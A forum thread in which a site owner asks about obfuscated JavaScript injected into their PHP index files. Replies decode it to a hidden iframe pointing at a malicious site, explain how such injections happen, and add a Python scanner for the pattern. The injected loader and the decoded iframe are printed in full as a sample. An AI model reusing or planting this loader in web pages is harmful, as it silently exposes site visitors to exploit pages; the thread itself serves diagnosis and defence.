Hi all, I need some help with this. I found that most of the PHP files on my computer have this code, and when those files are scanned with Kaspersky they show up as virus infected. Can somebody tell me what exactly this code does?

echo "<script type=\"text/javascript\">\r\nfunction C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072=\"\";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>";

Thanks - Xak
It creates this HTML:

<iframe src="http://money2008.org/tmp/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Gosh, I didn't know it would create such an iframe..... In fact I didn't understand the code either. Mine is a US-based site. How is it making money out of it?
Only Robert_2006 can answer this question. But I want to know one more thing: how is this code injected into my PHP files (only index.php)? Is it through my host?
Common enough practice for a while now for bot-like scripts to spider a compromised server and modify any/all index.* files they can find... whereas there are a few defacing ones, somebody figured out a way to make money out of it; not surprised at all. First thing I'd do is run something like rootkit hunter (on a Linux host) and check any/all PHP files it can find. Getting your site 'framed' is bad though - the fact that the target page is this: _http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://money2008.org/tmp/ - is probably worse. Effectively, you are helping attack unsuspecting visitors that may be vulnerable to whatever exploits they have set up. Look at your logs, look for injections on upload forms in particular. If you can't find anything suspicious, make sure your hosting is in "safe mode" - otherwise, anybody compromised on the server would allow Apache to affect the remaining sites also and affect files outside of the hosting sandbox...
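Doing the decode step from the injected snippet offline, and sweeping PHP files for the same pattern as the previous post suggests, as an added example that is not from any poster in this thread: the script takes the hex string two characters at a time, parseInt()s each pair with radix 16 and document.write()s the result, so repeating that decode statically shows the hidden iframe and its target without ever loading the page. The payload hex is the one quoted above; the file paths and sample sources are constructed.

```python
import re
import sys
from pathlib import Path

# Hex string quoted in the thread. The injected script decodes it 2 chars at a time with
# parseInt(.., 16) and document.write()s the result; the same decode offline exposes the iframe.
PAYLOAD_HEX = ("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F22"
               "2077696474683D31206865696768743D31207374796C653D227669736962696C6974793A"
               "68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E")

# Constructed sample sources (hypothetical paths): the injected echo, reduced to its decoder call, plus a clean file.
SAMPLE_SOURCES = {
    "/var/www/example/index.php": '<?php echo "<script type=\\"text/javascript\\">\\r\\n'
        'DB47FCE800845F2179C(\\"' + PAYLOAD_HEX + '\\");\\r\\n</script>"; ?>',
    "/var/www/example/about.php": "<?php echo '<p>clean page</p>'; ?>",
}

# A call whose sole argument is a long run of hex pairs; quotes may be backslash-escaped.
HEX_ARG_RE = re.compile(r'\(\\?["\']((?:[0-9A-Fa-f]{2}){16,})\\?["\']\)')
# An iframe hidden by CSS or shrunk to a 0/1-pixel box, as in the decoded payload.
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)=["\']?[01]\b)',
    re.IGNORECASE)

def decode_hex_pairs(hexstr: str) -> str:
    """Mirror the injected loop: substr(i, 2) -> parseInt(.., 16) -> String.fromCharCode."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))

def find_hidden_iframes(source: str) -> list[str]:
    """Return the src of each hidden iframe reachable by decoding hex-string arguments."""
    hits = []
    for match in HEX_ARG_RE.finditer(source):
        decoded = decode_hex_pairs(match.group(1))
        if HIDDEN_IFRAME_RE.search(decoded):
            src = re.search(r'src=["\']([^"\']+)', decoded, re.IGNORECASE)
            hits.append(src.group(1) if src else decoded)
    return hits

def scan_sources(sources: dict[str, str]) -> dict[str, list[str]]:
    """Map path -> hidden iframe targets, keeping only files with findings."""
    return {p: hit for p, text in sources.items() if (hit := find_hidden_iframes(text))}

def load_tree(root: str) -> dict[str, str]:
    """Read every .php file under root (the bot in the thread rewrote index.* files)."""
    return {str(p): p.read_text(errors="replace") for p in Path(root).rglob("*.php")}

if __name__ == "__main__":  # with no argument, scan the constructed sample instead of disk
    targets = load_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SOURCES
    for path, found in scan_sources(targets).items():
        print(f"{path}: hidden iframe(s) -> {', '.join(found)}")
```

Run it with a document root as the argument to sweep real files; the hidden-iframe check is what separates this from an ordinary hex decode, since a legitimate script may also carry hex data.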
Very nice explanation... Now I have understood what went wrong. But again, I am sure my host was not compromised for this. I have a HostGator server. As far as I know about HostGator, they always try to provide the best service. Thanks for the information once again... I really appreciate your effort. -Xak